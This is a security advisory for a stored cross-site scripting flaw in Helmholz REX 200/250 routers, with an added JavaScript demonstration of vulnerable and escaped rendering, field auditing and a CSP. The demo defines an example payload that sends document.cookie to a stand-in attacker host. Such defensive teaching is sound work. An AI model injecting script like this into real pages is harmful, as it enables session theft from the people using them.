Helmholz: Cross-site Scripting vulnerability in REX 200/REX 250
Monitor · CVSS 4.8 · VDE-2023-029 · Aug 17, 2023
Attack Vector: Network
Auth Required: High
Complexity: Low
User Interaction: Required
Summary
A stored cross-site scripting (XSS) vulnerability exists in Helmholz REX 200 and REX 250 devices in all versions before 7.3.2. An attacker with engineering credentials can inject malicious JavaScript into the device interface, which executes in the browsers of other authorized users who access the same interface pages, enabling session hijacking or unauthorized process control.
What this means
What could happen
An attacker with high-privilege access to the REX 200/250 engineering interface could inject script that executes in the browsers of other users of that interface. Because the script runs inside the victim's authenticated session, it could steal session tokens, make configuration changes with the victim's rights, or redirect the victim's browser to an attacker-controlled page. The impact is bounded by what the most privileged viewer can do through the web interface.
Who's at risk
Water utilities and municipal electric operators running Helmholz REX 200 or REX 250 industrial routers (remote-maintenance gateways into automation networks) on firmware versions prior to 7.3.2. Any facility that uses these devices to reach process control or SCADA networks is in scope.
How it could be exploited
An attacker with engineering/administrative credentials stores malicious JavaScript in the REX 200/250 web interface. When other authorized users (e.g., process operators or plant engineers) view the affected pages, the injected code runs in their browser session, granting the attacker the same access level as the victim user.
Prerequisites
- Engineering or administrative credentials for REX 200 or REX 250
- Ability to navigate to and modify data fields in the web interface
- Target operators must access the affected pages in their browser after injection
Remotely exploitable via web interface · Requires high-privilege credentials · Affects multiple operator sessions
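The inject-then-render sequence described above, as an added example that is neither Helmholz firmware code nor anything the advisory publishes: a minimal model of a device web interface with the vulnerable string concatenation beside the HTML-encoded form, a check for whether rendered markup would execute script, and an audit of already-stored fields (the audit goes beyond the advisory's text, since patching changes how fields render, not what an engineering account stored before the update). The field names, the payload, the helper functions and the CSP value are assumptions chosen for illustration.

```javascript
// Added example, not Helmholz firmware code: a minimal model of the stored
// XSS described in the advisory. Field names, rendering functions, the
// escaping helper, the audit regexes and the CSP value are assumptions.

// In-memory stand-in for device configuration that an engineering account
// can edit and that every later viewer of the status page gets rendered.
const deviceConfig = { deviceName: "REX-250 pumphouse", location: "Hall 2" };

// Constructed payload for the demonstration; the advisory publishes none.
const PAYLOAD =
  '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>';

// Step 1: a user with engineering credentials stores attacker-controlled text.
function saveField(field, value) {
  deviceConfig[field] = String(value);
}

// Vulnerable rendering: stored text is concatenated into HTML unchanged, so
// the browser of anyone who opens the page parses the payload as markup.
function renderStatusVulnerable(cfg = deviceConfig) {
  return `<h1>Device: ${cfg.deviceName}</h1><p>Location: ${cfg.location}</p>`;
}

// Fix: HTML-encode the five significant characters before interpolation.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderStatusFixed(cfg = deviceConfig) {
  return `<h1>Device: ${escapeHtml(cfg.deviceName)}</h1><p>Location: ${escapeHtml(cfg.location)}</p>`;
}

// Would a browser execute script from this markup? Looks for a real script
// element or an inline event handler on a tag; the encoded output of
// renderStatusFixed can never contain either.
function wouldExecuteScript(html) {
  return /<script\b/i.test(html) || /<[a-z]+[^>]*\son\w+\s*=/i.test(html);
}

// Post-incident audit of stored fields: returns the names of fields whose
// content looks like markup, an event handler, or a javascript: URL.
function findSuspiciousFields(cfg) {
  const markers = [/<\s*[a-z!\/]/i, /\bon\w+\s*=/i, /javascript:/i];
  return Object.keys(cfg).filter((k) => markers.some((re) => re.test(cfg[k])));
}

// Defence in depth for any page with a remaining encoding gap: a CSP that
// refuses inline script. Assumed header value, not a REX configuration option.
const CSP_HEADER =
  "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Walk through the scenario.
saveField("deviceName", PAYLOAD);
console.log("vulnerable executes script:", wouldExecuteScript(renderStatusVulnerable())); // true
console.log("fixed executes script:", wouldExecuteScript(renderStatusFixed()));           // false
console.log("fields to review:", findSuspiciousFields(deviceConfig));                     // [ 'deviceName' ]
console.log("Content-Security-Policy:", CSP_HEADER);
```

The encoding in `escapeHtml` is the fix the firmware update has to contain for every stored field that reaches a page; `findSuspiciousFields` is what an operator would run over a configuration export after patching to find out whether an engineering account had already planted something.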
Affected products (2), 2 with fix
Product    Affected Versions    Fix Status
REX 200    < 7.3.2              7.3.2
REX 250    < 7.3.2              7.3.2
Remediation & Mitigation
Schedule — requires maintenance window
Patching may require device reboot — plan for process interruption
REX 200 / REX 250
HOTFIX: Update REX 200 and REX 250 to firmware version 7.3.2 or later. Only the firmware update removes the vulnerability; the hardening items below reduce who can reach the interface and who can obtain the engineering credentials the attack requires, but do not fix the rendering flaw.
Long-term hardening
REX 200 / REX 250
HARDENING: Restrict access to the REX 200/250 engineering interface to trusted internal networks and require VPN for remote access
All products
HARDENING: Implement account lockout or monitoring for failed login attempts to detect credential compromise attempts
CVEs (1)
API:
/api/v1/advisories/6aa15409-f6e6-4d2f-8708-43cf32e9e704